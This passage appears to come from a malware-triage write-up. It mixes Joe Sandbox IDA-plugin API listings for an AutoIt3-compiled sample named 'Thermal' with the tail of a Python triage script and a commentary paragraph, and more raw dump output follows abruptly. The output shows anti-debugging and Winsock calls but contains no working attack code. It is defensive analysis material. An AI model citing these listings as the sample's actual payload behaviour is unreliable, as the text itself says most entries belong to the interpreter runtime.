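• Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• Instruction Fuzzy Hash: 6911C270501325BAEF298F518C89EFBFBACFF06755F10822AF54556100E7706994D6F0
APIs
  • Part of subcall function 001986E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0019849D,?,00000000,?,?), ref: 001986F7
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001984A0
• htons.WSOCK32(00000000,?,00000000), ref: 001984DD
Strings
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• Instruction Fuzzy Hash: F011A17560420AABDF14AF64CC46FEEB768FF15320F10861AF915972D2DB71B810C795
APIs
  • Part of subcall function 0015B544: _memset.LIBCMT ref: 0015B551
• IsDebuggerPresent.KERNEL32(?,?,?,0012100A), ref: 0015B524
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0012100A), ref: 0015B533
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0015B52E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        if set(row["caps"]) - {"gui"}:  # skip pure window-handling code when reading by hand
            print(row["api_id"], row["caps"], row["wininet"], row["direct_apis"])
```

Two caveats when reading the output against this sample. First, the MessageBoxW caption "AutoIt" with the text "Error allocating memory." and the "EA06" marker read by the __fread_nolock function are the AutoIt3 runtime's own out-of-memory handler and compiled-script signature, so most of this inventory (the ComboBox/ListBox/edit/static handling, #32770 dialog checks, WinINet and Winsock wrappers) describes the interpreter's built-in functions; the sample's real behaviour is in the script it carries, which this function listing does not show. Second, the Instruction Fuzzy Hash is the field to pivot on across reports, since it stays stable when the runtime is rebuilt with different addresses, whereas the ref: offsets above are specific to this dump.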
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00160091
                                                        • Part of subcall function 0019C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0016027A,?), ref: 0019C6E7
                                                        • Part of subcall function 0019C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0019C6F9
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00160289
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 582185067-3257408948
                                                      • Opcode ID: 9b13b4686324675040c9c1d9493b3bb17a65b3e6dcb8890b2ea35757354806d2
                                                      • Instruction ID: 1ead1ec5379a9705ae0f8fb4529665b4127ff1842a68a62b868d7d39cc64f773
                                                      • Opcode Fuzzy Hash: 9b13b4686324675040c9c1d9493b3bb17a65b3e6dcb8890b2ea35757354806d2
                                                      • Instruction Fuzzy Hash: 17F0C971805109DFCB1ADBA4CD98BEEBBB8AB0C340F241085F146B6590CB714F94DF21